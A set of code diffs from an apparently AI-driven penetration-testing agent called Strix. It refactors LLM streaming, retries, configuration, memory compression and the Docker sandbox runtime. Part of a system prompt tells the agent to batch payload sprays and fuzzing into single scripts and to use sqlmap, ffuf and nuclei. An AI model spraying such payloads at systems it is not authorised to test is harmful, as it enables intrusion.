- Incorrect: {"think": {...}}
6. Parameters must use <parameter=param_name>value</parameter> exactly. Do NOT pass parameters as JSON or key:value lines. Do NOT add quotes/braces around values.
7. Do NOT wrap tool calls in markdown/code fences or add any text before or after the tool block.
7. Parameters must use <parameter=param_name>value</parameter> exactly. Do NOT pass parameters as JSON or key:value lines. Do NOT add quotes/braces around values.
8. Do NOT wrap tool calls in markdown/code fences or add any text before or after the tool block.
Example (agent creation tool):
<function=create_agent>
@@ -331,6 +332,8 @@ SPRAYING EXECUTION NOTE:
- When performing large payload sprays or fuzzing, encapsulate the entire spraying loop inside a single python or terminal tool call (e.g., a Python script using asyncio/aiohttp). Do not issue one tool call per payload.
- Favor batch-mode CLI tools (sqlmap, ffuf, nuclei, zaproxy, arjun) where appropriate and check traffic via the proxy when beneficial
REMINDER: Always close each tool call with </function> before going into the next. Incomplete tool calls will fail.
{{ get_tools_prompt() }}
</tool_usage>

View File

@@ -1,7 +1,6 @@
import asyncio
import contextlib
import logging
from pathlib import Path
from typing import TYPE_CHECKING, Any, Optional
@@ -18,6 +17,7 @@ from strix.llm import LLM, LLMConfig, LLMRequestFailedError
from strix.llm.utils import clean_content
from strix.runtime import SandboxInitializationError
from strix.tools import process_tool_invocations
from strix.utils.resource_paths import get_strix_resource_path
from .state import AgentState
@@ -35,8 +35,7 @@ class AgentMeta(type):
if name == "BaseAgent":
return new_cls
agents_dir = Path(__file__).parent
prompt_dir = agents_dir / name
prompt_dir = get_strix_resource_path("agents", name)
new_cls.agent_name = name
new_cls.jinja_env = Environment(
@@ -66,20 +65,21 @@ class BaseAgent(metaclass=AgentMeta):
self.llm_config = config.get("llm_config", self.default_llm_config)
if self.llm_config is None:
raise ValueError("llm_config is required but not provided")
self.llm = LLM(self.llm_config, agent_name=self.agent_name)
state_from_config = config.get("state")
if state_from_config is not None:
self.state = state_from_config
else:
self.state = AgentState(
agent_name=self.agent_name,
agent_name="Root Agent",
max_iterations=self.max_iterations,
)
self.llm = LLM(self.llm_config, agent_name=self.agent_name)
with contextlib.suppress(Exception):
self.llm.set_agent_identity(self.agent_name, self.state.agent_id)
self.llm.set_agent_identity(self.state.agent_name, self.state.agent_id)
self._current_task: asyncio.Task[Any] | None = None
self._force_stop = False
from strix.telemetry.tracer import get_global_tracer
@@ -157,6 +157,11 @@ class BaseAgent(metaclass=AgentMeta):
return self._handle_sandbox_error(e, tracer)
while True:
if self._force_stop:
self._force_stop = False
await self._enter_waiting_state(tracer, was_cancelled=True)
continue
self._check_agent_messages(self.state)
if self.state.is_waiting_for_input():
@@ -247,7 +252,8 @@ class BaseAgent(metaclass=AgentMeta):
continue
async def _wait_for_input(self) -> None:
import asyncio
if self._force_stop:
return
if self.state.has_waiting_timeout():
self.state.resume_from_waiting()
@@ -340,6 +346,7 @@ class BaseAgent(metaclass=AgentMeta):
async def _process_iteration(self, tracer: Optional["Tracer"]) -> bool:
final_response = None
async for response in self.llm.generate(self.state.get_conversation_history()):
final_response = response
if tracer and response.content:
@@ -585,6 +592,11 @@ class BaseAgent(metaclass=AgentMeta):
return True
def cancel_current_execution(self) -> None:
self._force_stop = True
if self._current_task and not self._current_task.done():
self._current_task.cancel()
try:
loop = self._current_task.get_loop()
loop.call_soon_threadsafe(self._current_task.cancel)
except RuntimeError:
self._current_task.cancel()
self._current_task = None

View File

@@ -16,18 +16,30 @@ class Config:
litellm_base_url = None
ollama_api_base = None
strix_reasoning_effort = "high"
strix_llm_max_retries = "5"
strix_memory_compressor_timeout = "30"
llm_timeout = "300"
llm_rate_limit_delay = "4.0"
llm_rate_limit_concurrent = "1"
_LLM_CANONICAL_NAMES = (
"strix_llm",
"llm_api_key",
"llm_api_base",
"openai_api_base",
"litellm_base_url",
"ollama_api_base",
"strix_reasoning_effort",
"strix_llm_max_retries",
"strix_memory_compressor_timeout",
"llm_timeout",
)
# Tool & Feature Configuration
perplexity_api_key = None
strix_disable_browser = "false"
# Runtime Configuration
strix_image = "ghcr.io/usestrix/strix-sandbox:0.1.10"
strix_image = "ghcr.io/usestrix/strix-sandbox:0.1.11"
strix_runtime_backend = "docker"
strix_sandbox_execution_timeout = "500"
strix_sandbox_execution_timeout = "120"
strix_sandbox_connect_timeout = "10"
# Telemetry
@@ -45,6 +57,20 @@ class Config:
def tracked_vars(cls) -> list[str]:
return [name.upper() for name in cls._tracked_names()]
@classmethod
def _llm_env_vars(cls) -> set[str]:
return {name.upper() for name in cls._LLM_CANONICAL_NAMES}
@classmethod
def _llm_env_changed(cls, saved_env: dict[str, Any]) -> bool:
for var_name in cls._llm_env_vars():
current = os.getenv(var_name)
if current is None:
continue
if saved_env.get(var_name) != current:
return True
return False
@classmethod
def get(cls, name: str) -> str | None:
env_name = name.upper()
@@ -88,10 +114,25 @@ class Config:
def apply_saved(cls) -> dict[str, str]:
saved = cls.load()
env_vars = saved.get("env", {})
if not isinstance(env_vars, dict):
env_vars = {}
cleared_vars = {
var_name
for var_name in cls.tracked_vars()
if var_name in os.environ and os.environ.get(var_name) == ""
}
if cleared_vars:
for var_name in cleared_vars:
env_vars.pop(var_name, None)
cls.save({"env": env_vars})
if cls._llm_env_changed(env_vars):
for var_name in cls._llm_env_vars():
env_vars.pop(var_name, None)
cls.save({"env": env_vars})
applied = {}
for var_name, var_value in env_vars.items():
if var_name in cls.tracked_vars() and not os.getenv(var_name):
if var_name in cls.tracked_vars() and var_name not in os.environ:
os.environ[var_name] = var_value
applied[var_name] = var_value

View File

@@ -112,22 +112,13 @@ class PythonRenderer(BaseToolRenderer):
return
stdout = result.get("stdout", "")
stderr = result.get("stderr", "")
stdout = cls._clean_output(stdout) if stdout else ""
stderr = cls._clean_output(stderr) if stderr else ""
if stdout:
text.append("\n")
formatted_output = cls._format_output(stdout)
text.append_text(formatted_output)
if stderr:
text.append("\n")
text.append(" stderr: ", style="bold #ef4444")
formatted_stderr = cls._format_output(stderr)
text.append_text(formatted_stderr)
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})

View File

@@ -180,7 +180,6 @@ def check_duplicate(
"model": model_name,
"messages": messages,
"timeout": 120,
"temperature": 0,
}
if api_key:
completion_kwargs["api_key"] = api_key

View File

@@ -1,60 +1,29 @@
import asyncio
import logging
from collections.abc import AsyncIterator
from dataclasses import dataclass
from enum import Enum
from pathlib import Path
from typing import Any
import litellm
from jinja2 import (
Environment,
FileSystemLoader,
select_autoescape,
)
from litellm import completion_cost, stream_chunk_builder, supports_reasoning
from jinja2 import Environment, FileSystemLoader, select_autoescape
from litellm import acompletion, completion_cost, stream_chunk_builder, supports_reasoning
from litellm.utils import supports_prompt_caching, supports_vision
from strix.config import Config
from strix.llm.config import LLMConfig
from strix.llm.memory_compressor import MemoryCompressor
from strix.llm.request_queue import get_global_queue
from strix.llm.utils import _truncate_to_first_function, parse_tool_invocations
from strix.llm.utils import (
_truncate_to_first_function,
fix_incomplete_tool_call,
parse_tool_invocations,
)
from strix.skills import load_skills
from strix.tools import get_tools_prompt
from strix.utils.resource_paths import get_strix_resource_path
MAX_RETRIES = 5
RETRY_MULTIPLIER = 8
RETRY_MIN = 8
RETRY_MAX = 64
def _should_retry(exception: Exception) -> bool:
status_code = None
if hasattr(exception, "status_code"):
status_code = exception.status_code
elif hasattr(exception, "response") and hasattr(exception.response, "status_code"):
status_code = exception.response.status_code
if status_code is not None:
return bool(litellm._should_retry(status_code))
return True
logger = logging.getLogger(__name__)
litellm.drop_params = True
litellm.modify_params = True
_LLM_API_KEY = Config.get("llm_api_key")
_LLM_API_BASE = (
Config.get("llm_api_base")
or Config.get("openai_api_base")
or Config.get("litellm_base_url")
or Config.get("ollama_api_base")
)
_STRIX_REASONING_EFFORT = Config.get("strix_reasoning_effort")
class LLMRequestFailedError(Exception):
def __init__(self, message: str, details: str | None = None):
@@ -63,20 +32,11 @@ class LLMRequestFailedError(Exception):
self.details = details
class StepRole(str, Enum):
AGENT = "agent"
USER = "user"
SYSTEM = "system"
@dataclass
class LLMResponse:
content: str
tool_invocations: list[dict[str, Any]] | None = None
scan_id: str | None = None
step_number: int = 1
role: StepRole = StepRole.AGENT
thinking_blocks: list[dict[str, Any]] | None = None # For reasoning models.
thinking_blocks: list[dict[str, Any]] | None = None
@dataclass
@@ -84,76 +44,63 @@ class RequestStats:
input_tokens: int = 0
output_tokens: int = 0
cached_tokens: int = 0
cache_creation_tokens: int = 0
cost: float = 0.0
requests: int = 0
failed_requests: int = 0
def to_dict(self) -> dict[str, int | float]:
return {
"input_tokens": self.input_tokens,
"output_tokens": self.output_tokens,
"cached_tokens": self.cached_tokens,
"cache_creation_tokens": self.cache_creation_tokens,
"cost": round(self.cost, 4),
"requests": self.requests,
"failed_requests": self.failed_requests,
}
class LLM:
def __init__(
self, config: LLMConfig, agent_name: str | None = None, agent_id: str | None = None
):
def __init__(self, config: LLMConfig, agent_name: str | None = None):
self.config = config
self.agent_name = agent_name
self.agent_id = agent_id
self.agent_id: str | None = None
self._total_stats = RequestStats()
self._last_request_stats = RequestStats()
self.memory_compressor = MemoryCompressor(model_name=config.model_name)
self.system_prompt = self._load_system_prompt(agent_name)
if _STRIX_REASONING_EFFORT:
self._reasoning_effort = _STRIX_REASONING_EFFORT
elif self.config.scan_mode == "quick":
reasoning = Config.get("strix_reasoning_effort")
if reasoning:
self._reasoning_effort = reasoning
elif config.scan_mode == "quick":
self._reasoning_effort = "medium"
else:
self._reasoning_effort = "high"
self.memory_compressor = MemoryCompressor(
model_name=self.config.model_name,
timeout=self.config.timeout,
)
def _load_system_prompt(self, agent_name: str | None) -> str:
if not agent_name:
return ""
if agent_name:
prompt_dir = Path(__file__).parent.parent / "agents" / agent_name
skills_dir = Path(__file__).parent.parent / "skills"
loader = FileSystemLoader([prompt_dir, skills_dir])
self.jinja_env = Environment(
loader=loader,
try:
prompt_dir = get_strix_resource_path("agents", agent_name)
skills_dir = get_strix_resource_path("skills")
env = Environment(
loader=FileSystemLoader([prompt_dir, skills_dir]),
autoescape=select_autoescape(enabled_extensions=(), default_for_string=False),
)
try:
skills_to_load = list(self.config.skills or [])
skills_to_load.append(f"scan_modes/{self.config.scan_mode}")
skills_to_load = [
*list(self.config.skills or []),
f"scan_modes/{self.config.scan_mode}",
]
skill_content = load_skills(skills_to_load, env)
env.globals["get_skill"] = lambda name: skill_content.get(name, "")
skill_content = load_skills(skills_to_load, self.jinja_env)
def get_skill(name: str) -> str:
return skill_content.get(name, "")
self.jinja_env.globals["get_skill"] = get_skill
self.system_prompt = self.jinja_env.get_template("system_prompt.jinja").render(
get_tools_prompt=get_tools_prompt,
loaded_skill_names=list(skill_content.keys()),
**skill_content,
)
except (FileNotFoundError, OSError, ValueError) as e:
logger.warning(f"Failed to load system prompt for {agent_name}: {e}")
self.system_prompt = "You are a helpful AI assistant."
else:
self.system_prompt = "You are a helpful AI assistant."
result = env.get_template("system_prompt.jinja").render(
get_tools_prompt=get_tools_prompt,
loaded_skill_names=list(skill_content.keys()),
**skill_content,
)
return str(result)
except Exception: # noqa: BLE001
return ""
def set_agent_identity(self, agent_name: str | None, agent_id: str | None) -> None:
if agent_name:
@@ -161,328 +108,121 @@ class LLM:
if agent_id:
self.agent_id = agent_id
def _build_identity_message(self) -> dict[str, Any] | None:
if not (self.agent_name and str(self.agent_name).strip()):
return None
identity_name = self.agent_name
identity_id = self.agent_id
content = (
"\n\n"
"<agent_identity>\n"
"<meta>Internal metadata: do not echo or reference; "
"not part of history or tool calls.</meta>\n"
"<note>You are now assuming the role of this agent. "
"Act strictly as this agent and maintain self-identity for this step. "
"Now go answer the next needed step!</note>\n"
f"<agent_name>{identity_name}</agent_name>\n"
f"<agent_id>{identity_id}</agent_id>\n"
"</agent_identity>\n\n"
)
return {"role": "user", "content": content}
async def generate(
self, conversation_history: list[dict[str, Any]]
) -> AsyncIterator[LLMResponse]:
messages = self._prepare_messages(conversation_history)
max_retries = int(Config.get("strix_llm_max_retries") or "5")
def _add_cache_control_to_content(
self, content: str | list[dict[str, Any]]
) -> str | list[dict[str, Any]]:
if isinstance(content, str):
return [{"type": "text", "text": content, "cache_control": {"type": "ephemeral"}}]
if isinstance(content, list) and content:
last_item = content[-1]
if isinstance(last_item, dict) and last_item.get("type") == "text":
return content[:-1] + [{**last_item, "cache_control": {"type": "ephemeral"}}]
return content
for attempt in range(max_retries + 1):
try:
async for response in self._stream(messages):
yield response
return # noqa: TRY300
except Exception as e: # noqa: BLE001
if attempt >= max_retries or not self._should_retry(e):
self._raise_error(e)
wait = min(10, 2 * (2**attempt))
await asyncio.sleep(wait)
def _is_anthropic_model(self) -> bool:
if not self.config.model_name:
return False
model_lower = self.config.model_name.lower()
return any(provider in model_lower for provider in ["anthropic/", "claude"])
async def _stream(self, messages: list[dict[str, Any]]) -> AsyncIterator[LLMResponse]:
accumulated = ""
chunks: list[Any] = []
def _calculate_cache_interval(self, total_messages: int) -> int:
if total_messages <= 1:
return 10
self._total_stats.requests += 1
response = await acompletion(**self._build_completion_args(messages), stream=True)
max_cached_messages = 3
non_system_messages = total_messages - 1
interval = 10
while non_system_messages // interval > max_cached_messages:
interval += 10
return interval
def _prepare_cached_messages(self, messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
if (
not self.config.enable_prompt_caching
or not supports_prompt_caching(self.config.model_name)
or not messages
):
return messages
if not self._is_anthropic_model():
return messages
cached_messages = list(messages)
if cached_messages and cached_messages[0].get("role") == "system":
system_message = cached_messages[0].copy()
system_message["content"] = self._add_cache_control_to_content(
system_message["content"]
)
cached_messages[0] = system_message
total_messages = len(cached_messages)
if total_messages > 1:
interval = self._calculate_cache_interval(total_messages)
cached_count = 0
for i in range(interval, total_messages, interval):
if cached_count >= 3:
async for chunk in response:
chunks.append(chunk)
delta = self._get_chunk_content(chunk)
if delta:
accumulated += delta
if "</function>" in accumulated:
accumulated = accumulated[
: accumulated.find("</function>") + len("</function>")
]
yield LLMResponse(content=accumulated)
break
yield LLMResponse(content=accumulated)
if i < len(cached_messages):
message = cached_messages[i].copy()
message["content"] = self._add_cache_control_to_content(message["content"])
cached_messages[i] = message
cached_count += 1
if chunks:
self._update_usage_stats(stream_chunk_builder(chunks))
return cached_messages
accumulated = fix_incomplete_tool_call(_truncate_to_first_function(accumulated))
yield LLMResponse(
content=accumulated,
tool_invocations=parse_tool_invocations(accumulated),
thinking_blocks=self._extract_thinking(chunks),
)
def _prepare_messages(self, conversation_history: list[dict[str, Any]]) -> list[dict[str, Any]]:
messages = [{"role": "system", "content": self.system_prompt}]
identity_message = self._build_identity_message()
if identity_message:
messages.append(identity_message)
compressed_history = list(self.memory_compressor.compress_history(conversation_history))
if self.agent_name:
messages.append(
{
"role": "user",
"content": (
f"\n\n<agent_identity>\n"
f"<meta>Internal metadata: do not echo or reference.</meta>\n"
f"<agent_name>{self.agent_name}</agent_name>\n"
f"<agent_id>{self.agent_id}</agent_id>\n"
f"</agent_identity>\n\n"
),
}
)
compressed = list(self.memory_compressor.compress_history(conversation_history))
conversation_history.clear()
conversation_history.extend(compressed_history)
messages.extend(compressed_history)
conversation_history.extend(compressed)
messages.extend(compressed)
return self._prepare_cached_messages(messages)
if self._is_anthropic() and self.config.enable_prompt_caching:
messages = self._add_cache_control(messages)
async def _stream_and_accumulate(
self,
messages: list[dict[str, Any]],
scan_id: str | None,
step_number: int,
) -> AsyncIterator[LLMResponse]:
accumulated_content = ""
chunks: list[Any] = []
return messages
async for chunk in self._stream_request(messages):
chunks.append(chunk)
delta = self._extract_chunk_delta(chunk)
if delta:
accumulated_content += delta
def _build_completion_args(self, messages: list[dict[str, Any]]) -> dict[str, Any]:
if not self._supports_vision():
messages = self._strip_images(messages)
if "</function>" in accumulated_content:
function_end = accumulated_content.find("</function>") + len("</function>")
accumulated_content = accumulated_content[:function_end]
yield LLMResponse(
scan_id=scan_id,
step_number=step_number,
role=StepRole.AGENT,
content=accumulated_content,
tool_invocations=None,
)
if chunks:
complete_response = stream_chunk_builder(chunks)
self._update_usage_stats(complete_response)
accumulated_content = _truncate_to_first_function(accumulated_content)
if "</function>" in accumulated_content:
function_end = accumulated_content.find("</function>") + len("</function>")
accumulated_content = accumulated_content[:function_end]
tool_invocations = parse_tool_invocations(accumulated_content)
# Extract thinking blocks from the complete response if available
thinking_blocks = None
if chunks and self._should_include_reasoning_effort():
complete_response = stream_chunk_builder(chunks)
if (
hasattr(complete_response, "choices")
and complete_response.choices
and hasattr(complete_response.choices[0], "message")
):
message = complete_response.choices[0].message
if hasattr(message, "thinking_blocks") and message.thinking_blocks:
thinking_blocks = message.thinking_blocks
yield LLMResponse(
scan_id=scan_id,
step_number=step_number,
role=StepRole.AGENT,
content=accumulated_content,
tool_invocations=tool_invocations if tool_invocations else None,
thinking_blocks=thinking_blocks,
)
def _raise_llm_error(self, e: Exception) -> None:
error_map: list[tuple[type, str]] = [
(litellm.RateLimitError, "Rate limit exceeded"),
(litellm.AuthenticationError, "Invalid API key"),
(litellm.NotFoundError, "Model not found"),
(litellm.ContextWindowExceededError, "Context too long"),
(litellm.ContentPolicyViolationError, "Content policy violation"),
(litellm.ServiceUnavailableError, "Service unavailable"),
(litellm.Timeout, "Request timed out"),
(litellm.UnprocessableEntityError, "Unprocessable entity"),
(litellm.InternalServerError, "Internal server error"),
(litellm.APIConnectionError, "Connection error"),
(litellm.UnsupportedParamsError, "Unsupported parameters"),
(litellm.BudgetExceededError, "Budget exceeded"),
(litellm.APIResponseValidationError, "Response validation error"),
(litellm.JSONSchemaValidationError, "JSON schema validation error"),
(litellm.InvalidRequestError, "Invalid request"),
(litellm.BadRequestError, "Bad request"),
(litellm.APIError, "API error"),
(litellm.OpenAIError, "OpenAI error"),
]
from strix.telemetry import posthog
for error_type, message in error_map:
if isinstance(e, error_type):
posthog.error(f"llm_{error_type.__name__}", message)
raise LLMRequestFailedError(f"LLM request failed: {message}", str(e)) from e
posthog.error("llm_unknown_error", type(e).__name__)
raise LLMRequestFailedError(f"LLM request failed: {type(e).__name__}", str(e)) from e
async def generate(
self,
conversation_history: list[dict[str, Any]],
scan_id: str | None = None,
step_number: int = 1,
) -> AsyncIterator[LLMResponse]:
messages = self._prepare_messages(conversation_history)
last_error: Exception | None = None
for attempt in range(MAX_RETRIES):
try:
async for response in self._stream_and_accumulate(messages, scan_id, step_number):
yield response
return # noqa: TRY300
except Exception as e: # noqa: BLE001
last_error = e
if not _should_retry(e) or attempt == MAX_RETRIES - 1:
break
wait_time = min(RETRY_MAX, RETRY_MULTIPLIER * (2**attempt))
wait_time = max(RETRY_MIN, wait_time)
await asyncio.sleep(wait_time)
if last_error:
self._raise_llm_error(last_error)
def _extract_chunk_delta(self, chunk: Any) -> str:
if chunk.choices and hasattr(chunk.choices[0], "delta"):
delta = chunk.choices[0].delta
return getattr(delta, "content", "") or ""
return ""
@property
def usage_stats(self) -> dict[str, dict[str, int | float]]:
return {
"total": self._total_stats.to_dict(),
"last_request": self._last_request_stats.to_dict(),
}
def get_cache_config(self) -> dict[str, bool]:
return {
"enabled": self.config.enable_prompt_caching,
"supported": supports_prompt_caching(self.config.model_name),
}
def _should_include_reasoning_effort(self) -> bool:
if not self.config.model_name:
return False
try:
return bool(supports_reasoning(model=self.config.model_name))
except Exception: # noqa: BLE001
return False
def _model_supports_vision(self) -> bool:
if not self.config.model_name:
return False
try:
return bool(supports_vision(model=self.config.model_name))
except Exception: # noqa: BLE001
return False
def _filter_images_from_messages(self, messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
filtered_messages = []
for msg in messages:
content = msg.get("content")
updated_msg = msg
if isinstance(content, list):
filtered_content = []
for item in content:
if isinstance(item, dict):
if item.get("type") == "image_url":
filtered_content.append(
{
"type": "text",
"text": "[Screenshot removed - model does not support "
"vision. Use view_source or execute_js instead.]",
}
)
else:
filtered_content.append(item)
else:
filtered_content.append(item)
if filtered_content:
text_parts = [
item.get("text", "") if isinstance(item, dict) else str(item)
for item in filtered_content
]
all_text = all(
isinstance(item, dict) and item.get("type") == "text"
for item in filtered_content
)
if all_text:
updated_msg = {**msg, "content": "\n".join(text_parts)}
else:
updated_msg = {**msg, "content": filtered_content}
else:
updated_msg = {**msg, "content": ""}
filtered_messages.append(updated_msg)
return filtered_messages
async def _stream_request(
self,
messages: list[dict[str, Any]],
) -> AsyncIterator[Any]:
if not self._model_supports_vision():
messages = self._filter_images_from_messages(messages)
completion_args: dict[str, Any] = {
args: dict[str, Any] = {
"model": self.config.model_name,
"messages": messages,
"timeout": self.config.timeout,
"stream_options": {"include_usage": True},
}
if _LLM_API_KEY:
completion_args["api_key"] = _LLM_API_KEY
if _LLM_API_BASE:
completion_args["api_base"] = _LLM_API_BASE
if api_key := Config.get("llm_api_key"):
args["api_key"] = api_key
if api_base := (
Config.get("llm_api_base")
or Config.get("openai_api_base")
or Config.get("litellm_base_url")
or Config.get("ollama_api_base")
):
args["api_base"] = api_base
if self._supports_reasoning():
args["reasoning_effort"] = self._reasoning_effort
completion_args["stop"] = ["</function>"]
return args
if self._should_include_reasoning_effort():
completion_args["reasoning_effort"] = self._reasoning_effort
def _get_chunk_content(self, chunk: Any) -> str:
if chunk.choices and hasattr(chunk.choices[0], "delta"):
return getattr(chunk.choices[0].delta, "content", "") or ""
return ""
queue = get_global_queue()
self._total_stats.requests += 1
self._last_request_stats = RequestStats(requests=1)
async for chunk in queue.stream_request(completion_args):
yield chunk
def _extract_thinking(self, chunks: list[Any]) -> list[dict[str, Any]] | None:
if not chunks or not self._supports_reasoning():
return None
try:
resp = stream_chunk_builder(chunks)
if resp.choices and hasattr(resp.choices[0].message, "thinking_blocks"):
blocks: list[dict[str, Any]] = resp.choices[0].message.thinking_blocks
return blocks
except Exception: # noqa: BLE001, S110 # nosec B110
pass
return None
def _update_usage_stats(self, response: Any) -> None:
try:
@@ -491,45 +231,88 @@ class LLM:
output_tokens = getattr(response.usage, "completion_tokens", 0)
cached_tokens = 0
cache_creation_tokens = 0
if hasattr(response.usage, "prompt_tokens_details"):
prompt_details = response.usage.prompt_tokens_details
if hasattr(prompt_details, "cached_tokens"):
cached_tokens = prompt_details.cached_tokens or 0
if hasattr(response.usage, "cache_creation_input_tokens"):
cache_creation_tokens = response.usage.cache_creation_input_tokens or 0
else:
input_tokens = 0
output_tokens = 0
cached_tokens = 0
cache_creation_tokens = 0
try:
cost = completion_cost(response) or 0.0
except Exception as e: # noqa: BLE001
logger.warning(f"Failed to calculate cost: {e}")
except Exception: # noqa: BLE001
cost = 0.0
self._total_stats.input_tokens += input_tokens
self._total_stats.output_tokens += output_tokens
self._total_stats.cached_tokens += cached_tokens
self._total_stats.cache_creation_tokens += cache_creation_tokens
self._total_stats.cost += cost
self._last_request_stats.input_tokens = input_tokens
self._last_request_stats.output_tokens = output_tokens
self._last_request_stats.cached_tokens = cached_tokens
self._last_request_stats.cache_creation_tokens = cache_creation_tokens
self._last_request_stats.cost = cost
except Exception: # noqa: BLE001, S110 # nosec B110
pass
if cached_tokens > 0:
logger.info(f"Cache hit: {cached_tokens} cached tokens, {input_tokens} new tokens")
if cache_creation_tokens > 0:
logger.info(f"Cache creation: {cache_creation_tokens} tokens written to cache")
def _should_retry(self, e: Exception) -> bool:
code = getattr(e, "status_code", None) or getattr(
getattr(e, "response", None), "status_code", None
)
return code is None or litellm._should_retry(code)
logger.info(f"Usage stats: {self.usage_stats}")
except Exception as e: # noqa: BLE001
logger.warning(f"Failed to update usage stats: {e}")
def _raise_error(self, e: Exception) -> None:
from strix.telemetry import posthog
posthog.error("llm_error", type(e).__name__)
raise LLMRequestFailedError(f"LLM request failed: {type(e).__name__}", str(e)) from e
def _is_anthropic(self) -> bool:
if not self.config.model_name:
return False
return any(p in self.config.model_name.lower() for p in ["anthropic/", "claude"])
def _supports_vision(self) -> bool:
try:
return bool(supports_vision(model=self.config.model_name))
except Exception: # noqa: BLE001
return False
def _supports_reasoning(self) -> bool:
try:
return bool(supports_reasoning(model=self.config.model_name))
except Exception: # noqa: BLE001
return False
def _strip_images(self, messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
result = []
for msg in messages:
content = msg.get("content")
if isinstance(content, list):
text_parts = []
for item in content:
if isinstance(item, dict) and item.get("type") == "text":
text_parts.append(item.get("text", ""))
elif isinstance(item, dict) and item.get("type") == "image_url":
text_parts.append("[Image removed - model doesn't support vision]")
result.append({**msg, "content": "\n".join(text_parts)})
else:
result.append(msg)
return result
def _add_cache_control(self, messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
if not messages or not supports_prompt_caching(self.config.model_name):
return messages
result = list(messages)
if result[0].get("role") == "system":
content = result[0]["content"]
result[0] = {
**result[0],
"content": [
{"type": "text", "text": content, "cache_control": {"type": "ephemeral"}}
]
if isinstance(content, str)
else content,
}
return result

View File

@@ -86,7 +86,7 @@ def _extract_message_text(msg: dict[str, Any]) -> str:
def _summarize_messages(
messages: list[dict[str, Any]],
model: str,
timeout: int = 600,
timeout: int = 30,
) -> dict[str, Any]:
if not messages:
empty_summary = "<context_summary message_count='0'>{text}</context_summary>"
@@ -148,11 +148,11 @@ class MemoryCompressor:
self,
max_images: int = 3,
model_name: str | None = None,
timeout: int = 600,
timeout: int | None = None,
):
self.max_images = max_images
self.model_name = model_name or Config.get("strix_llm")
self.timeout = timeout
self.timeout = timeout or int(Config.get("strix_memory_compressor_timeout") or "30")
if not self.model_name:
raise ValueError("STRIX_LLM environment variable must be set and not empty")

View File

@@ -1,58 +0,0 @@
import asyncio
import threading
import time
from collections.abc import AsyncIterator
from typing import Any
from litellm import acompletion
from litellm.types.utils import ModelResponseStream
from strix.config import Config
class LLMRequestQueue:
def __init__(self) -> None:
self.delay_between_requests = float(Config.get("llm_rate_limit_delay") or "4.0")
self.max_concurrent = int(Config.get("llm_rate_limit_concurrent") or "1")
self._semaphore = threading.BoundedSemaphore(self.max_concurrent)
self._last_request_time = 0.0
self._lock = threading.Lock()
async def stream_request(
self, completion_args: dict[str, Any]
) -> AsyncIterator[ModelResponseStream]:
try:
while not self._semaphore.acquire(timeout=0.2):
await asyncio.sleep(0.1)
with self._lock:
now = time.time()
time_since_last = now - self._last_request_time
sleep_needed = max(0, self.delay_between_requests - time_since_last)
self._last_request_time = now + sleep_needed
if sleep_needed > 0:
await asyncio.sleep(sleep_needed)
async for chunk in self._stream_request(completion_args):
yield chunk
finally:
self._semaphore.release()
async def _stream_request(
self, completion_args: dict[str, Any]
) -> AsyncIterator[ModelResponseStream]:
response = await acompletion(**completion_args, stream=True)
async for chunk in response:
yield chunk
_global_queue: LLMRequestQueue | None = None
def get_global_queue() -> LLMRequestQueue:
global _global_queue # noqa: PLW0603
if _global_queue is None:
_global_queue = LLMRequestQueue()
return _global_queue

View File

@@ -18,7 +18,7 @@ def _truncate_to_first_function(content: str) -> str:
def parse_tool_invocations(content: str) -> list[dict[str, Any]] | None:
content = _fix_stopword(content)
content = fix_incomplete_tool_call(content)
tool_invocations: list[dict[str, Any]] = []
@@ -46,16 +46,15 @@ def parse_tool_invocations(content: str) -> list[dict[str, Any]] | None:
return tool_invocations if tool_invocations else None
def _fix_stopword(content: str) -> str:
def fix_incomplete_tool_call(content: str) -> str:
"""Fix incomplete tool calls by adding missing </function> tag."""
if (
"<function=" in content
and content.count("<function=") == 1
and "</function>" not in content
):
if content.endswith("</"):
content = content.rstrip() + "function>"
else:
content = content + "\n</function>"
content = content.rstrip()
content = content + "function>" if content.endswith("</") else content + "\n</function>"
return content
@@ -74,7 +73,7 @@ def clean_content(content: str) -> str:
if not content:
return ""
content = _fix_stopword(content)
content = fix_incomplete_tool_call(content)
tool_pattern = r"<function=[^>]+>.*?</function>"
cleaned = re.sub(tool_pattern, "", content, flags=re.DOTALL)

View File

@@ -1,15 +1,13 @@
import contextlib
import logging
import os
import secrets
import socket
import time
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import TimeoutError as FuturesTimeoutError
from pathlib import Path
from typing import Any, cast
from typing import cast
import docker
import httpx
from docker.errors import DockerException, ImageNotFound, NotFound
from docker.models.containers import Container
from requests.exceptions import ConnectionError as RequestsConnectionError
@@ -22,10 +20,8 @@ from .runtime import AbstractRuntime, SandboxInfo
HOST_GATEWAY_HOSTNAME = "host.docker.internal"
DOCKER_TIMEOUT = 60 # seconds
TOOL_SERVER_HEALTH_REQUEST_TIMEOUT = 5 # seconds per health check request
TOOL_SERVER_HEALTH_RETRIES = 10 # number of retries for health check
logger = logging.getLogger(__name__)
DOCKER_TIMEOUT = 60
CONTAINER_TOOL_SERVER_PORT = 48081
class DockerRuntime(AbstractRuntime):
@@ -33,50 +29,20 @@ class DockerRuntime(AbstractRuntime):
try:
self.client = docker.from_env(timeout=DOCKER_TIMEOUT)
except (DockerException, RequestsConnectionError, RequestsTimeout) as e:
logger.exception("Failed to connect to Docker daemon")
if isinstance(e, RequestsConnectionError | RequestsTimeout):
raise SandboxInitializationError(
"Docker daemon unresponsive",
f"Connection timed out after {DOCKER_TIMEOUT} seconds. "
"Please ensure Docker Desktop is installed and running, "
"and try running strix again.",
) from e
raise SandboxInitializationError(
"Docker is not available",
"Docker is not available or not configured correctly. "
"Please ensure Docker Desktop is installed and running, "
"and try running strix again.",
"Please ensure Docker Desktop is installed and running.",
) from e
self._scan_container: Container | None = None
self._tool_server_port: int | None = None
self._tool_server_token: str | None = None
def _generate_sandbox_token(self) -> str:
return secrets.token_urlsafe(32)
def _find_available_port(self) -> int:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind(("", 0))
return cast("int", s.getsockname()[1])
def _exec_run_with_timeout(
self, container: Container, cmd: str, timeout: int = DOCKER_TIMEOUT, **kwargs: Any
) -> Any:
with ThreadPoolExecutor(max_workers=1) as executor:
future = executor.submit(container.exec_run, cmd, **kwargs)
try:
